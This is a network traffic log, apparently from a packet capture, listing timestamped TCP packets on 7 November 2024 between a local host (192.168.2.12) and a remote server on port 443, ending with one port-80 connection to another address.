Nov 7, 2024 12:49:03.997916937 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:03.998965025 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.999007940 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:03.999031067 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.000545979 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.001250982 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.001343012 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.001769066 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.006464005 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.051621914 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.121614933 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.124444008 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.129240036 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.130790949 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.131086111 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.131149054 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.131567001 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.131606102 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.131654024 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.132169008 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.133481979 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.134255886 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.134413958 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.134802103 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.139132023 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.139611006 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.253289938 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.256092072 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.264308929 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.264369011 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.264378071 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.264425993 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.264930010 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.264993906 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.265170097 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:04.267961025 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.268106937 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.268455982 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.268557072 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.487795115 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:04.800314903 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.311511993 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.311598063 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.311707973 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.311899900 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.311944962 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.312645912 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.312700987 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.313863039 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.313873053 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.316618919 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.321410894 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.438182116 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.438205957 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.438261986 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.438631058 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.439472914 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.439541101 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.439563036 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.442754030 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.443474054 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.443960905 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.444789886 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.445571899 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.445632935 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.447570086 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.447607040 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.448810101 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.448820114 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.449666977 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.452485085 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.572726965 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.574007034 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.574071884 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.574115038 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.574268103 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.575371981 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.575973034 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.577301025 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.577577114 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.577822924 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.578493118 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.579560995 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.582268000 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.582463980 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.583081961 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.583256960 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.584340096 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.711971998 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.711990118 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.712120056 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.712719917 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.712806940 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.714986086 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.715044975 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.732233047 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.732319117 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.732777119 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.733094931 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.733423948 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.737245083 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.737647057 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.737874031 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.738219976 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.861896992 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.861920118 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.861938953 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.861994028 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.862298965 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.862935066 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.863003969 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.863270044 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.863337040 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.865930080 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.866023064 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.866796017 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.866926908 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.867244005 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:05.870821953 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.871670961 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.871757984 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:05.871999979 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.003243923 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.003267050 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.003282070 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.003377914 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.003395081 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.003485918 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.004004002 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.004349947 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.007291079 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.186400890 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.186860085 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.188250065 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.189105034 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.189811945 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.191225052 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.191632986 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.193053961 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.193923950 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.194730997 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.315690041 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.315716982 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.315807104 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.316953897 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.317179918 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.318860054 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.318926096 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.319005966 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.319185019 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.319880962 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.321774960 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.321784973 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.323941946 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.324701071 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.326814890 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.447968006 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.447983027 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.448049068 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.448175907 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.449331045 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.449397087 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.450448036 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.450943947 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.450990915 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.466721058 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.471695900 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.473685026 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.474941969 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.476156950 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.477375984 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.478532076 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.479829073 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.480963945 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.482177019 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.605506897 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.605537891 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.605598927 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.605882883 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.605926991 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.605982065 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.606878996 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.610702038 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.610812902 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.611824989 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.612576008 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.612879992 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.615513086 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.615649939 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.616652012 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.617319107 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.617623091 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.739435911 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.739468098 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.739545107 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.740195036 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.741080046 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.741134882 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.741300106 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.742033958 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.742078066 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.782108068 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.786906004 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.789041042 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.790111065 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.792028904 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.793406963 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.793919086 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.794887066 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.797039032 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.798401117 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.918730974 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.918926954 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.919011116 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.919378042 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.921035051 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.921116114 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.922358990 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.929044962 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.929945946 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.931415081 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.932838917 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.933938980 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.935626030 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:06.935647011 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.936239958 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.937680006 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:06.940395117 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.058054924 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.059273958 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.059336901 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.059672117 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.061393976 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.061449051 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.063877106 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.065078020 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.065779924 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.070611000 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.110301018 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.111753941 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.112751961 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.115156889 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.116638899 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.117490053 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.195012093 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.195396900 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.195470095 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.198210955 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.199120998 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.203170061 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.203938007 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.247033119 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.247123003 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.247174025 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.247181892 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.247680902 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.247742891 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.249988079 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.251044035 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.251339912 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.254852057 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.255817890 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.256155968 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.331027031 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.331038952 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.331094980 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.331710100 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.371529102 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.372601986 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.376331091 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.377368927 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.379201889 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.380131006 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.380225897 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.380851030 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.382152081 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.384454012 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.385297060 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.389272928 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.431684017 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.500463009 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.500981092 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.501046896 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.505448103 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.508727074 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.510338068 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.511429071 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.512723923 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.512778044 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.513709068 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.533713102 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.553622007 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.553733110 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.558892965 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.599688053 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.634485006 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.637345076 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.637403965 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.662936926 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.681515932 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.682265997 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.684701920 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.686748981 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.686762094 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.686774015 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.686824083 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.686866045 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.689944983 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.690125942 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.724505901 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.729552984 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.811295986 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.811578989 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.811645985 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.811697960 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.814342976 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.814403057 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.814414978 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.814450979 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.814450979 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.815150023 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.815469980 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.819657087 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.819668055 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.819726944 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.819726944 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.820339918 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.821115017 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.822992086 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.827852011 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.856108904 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.887475967 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.935653925 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.943784952 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.947841883 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.948201895 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.949234962 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.951718092 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:07.951780081 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.988646984 CET	49713	80	192.168.2.12	158.101.44.242
